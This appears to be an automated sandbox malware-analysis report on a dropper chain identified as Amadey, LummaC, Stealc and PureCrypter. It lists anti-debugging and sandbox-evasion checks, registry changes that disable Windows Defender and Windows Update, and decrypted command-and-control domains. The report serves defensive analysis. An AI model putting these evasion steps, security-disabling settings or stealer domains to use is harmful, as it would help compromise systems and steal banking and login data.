Source: 28d9ab8742.exe, 0000001F.00000002.3051578916.000000000178B000.00000004.00000020.00020000.00000000.sdmp, 3daf81f16e.exe, 00000024.00000002.3289871087.0000000001578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
Source: DocumentsECBGHCGCBK.exe, 00000016.00000003.2492465000.0000000001202000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ECGDBAEH.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C6D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn$
Source: 3daf81f16e.exe, 0000001B.00000002.2882880413.000000000146E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwaret]-
Source: ECGDBAEH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 28d9ab8742.exe, 0000001F.00000003.2979808969.0000000005EE7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: 28d9ab8742.exe, 0000001A.00000003.2852160535.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2878148913.0000000000CDC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875540719.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2862807328.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hPMMXdHgFSepDMR/hQcK8SWb
Source: ECGDBAEH.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000A4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhM
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}4M1
Source: 28d9ab8742.exe, 0000001A.00000002.3026569663.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware7$
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: ECGDBAEH.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: ECGDBAEH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: ECGDBAEH.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: ECGDBAEH.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: ECGDBAEH.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: ECGDBAEH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2489783682.000000000057B000.00000040.00000001.01000000.00000003.sdmp, DocumentsECBGHCGCBK.exe, 00000016.00000002.2530668954.0000000000645000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000017.00000002.2555184908.0000000000225000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 00000018.00000001.2704020694.0000000000225000.00000080.00000001.01000000.0000000D.sdmp, 28d9ab8742.exe, 0000001A.00000002.3027876298.0000000000F4F000.00000040.00000001.01000000.0000000E.sdmp, 28d9ab8742.exe, 0000001A.00000002.3032195949.00000000061DB000.00000040.00000800.00020000.00000000.sdmp, 3daf81f16e.exe, 0000001B.00000002.2881962728.0000000000CEB000.00000040.00000001.01000000.0000000F.sdmp, 28d9ab8742.exe, 0000001F.00000002.3049776651.0000000000F4F000.00000040.00000001.01000000.0000000E.sdmp, be33d1b9ea.exe, 00000020.00000002.3065236093.000000000112F000.00000040.00000001.01000000.00000010.sdmp, 3daf81f16e.exe, 00000021.00000002.3089225827.0000000000CEB000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: ECGDBAEH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: ECGDBAEH.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process queried: DebugPort
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_04FA0CDD rdtsc 22_2_04FA0CDD
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB35FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CB35FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CAD3480
Contains functionality to read the PEB
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_0049652B mov eax, dword ptr fs:[00000030h] 22_2_0049652B
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_0049A302 mov eax, dword ptr fs:[00000030h] 22_2_0049A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0007A302 mov eax, dword ptr fs:[00000030h] 23_2_0007A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0007652B mov eax, dword ptr fs:[00000030h] 23_2_0007652B
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CB0B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CB0B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CCBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CCBAC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 2724, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 9140, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3daf81f16e.exe PID: 6076, type: MEMORYSTR
Detected PureCrypter Trojan
Source: 28d9ab8742.exe, 0000001A.00000003.2849723649.00000000056EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1222396-1-3,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1008556-23-102,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,v1_disable_abandoned_cart:506070,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,i8id9958:449025,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1039913-1-22,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDisableAbandonedCart":{"disableFeatures":["msEdgeShoppingPwiloNotificationsAbandonedCarts"]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]
LummaC encrypted strings found
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: scriptyprefej.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: navygenerayk.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: founpiuer.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: necklacedmny.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: thumbystriw.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: fadehairucw.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: crisiwarny.store
Source: 28d9ab8742.exe, 0000001A.00000002.3027529258.0000000000D61000.00000040.00000001.01000000.0000000E.sdmp String found in binary or memory: presticitpo.store
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECBGHCGCBK.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECBGHCGCBK.exe "C:\Users\user\DocumentsECBGHCGCBK.exe"
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe "C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe "C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CD04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 0_2_6CD04760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CBE1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 0_2_6CBE1C30
Source: file.exe Binary or memory string: wProgram Manager
Source: file.exe, 00000000.00000002.2489783682.000000000057B000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B341 cpuid 0_2_6CB0B341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CAD35A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC08390 NSS_GetVersion, 0_2_6CC08390
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 23.2.skotes.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.DocumentsECBGHCGCBK.exe.460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.2554745091.0000000000041000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2524957576.0000000000461000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 4068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 28d9ab8742.exe PID: 7408, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000021.00000003.2999328469.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.3247798892.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
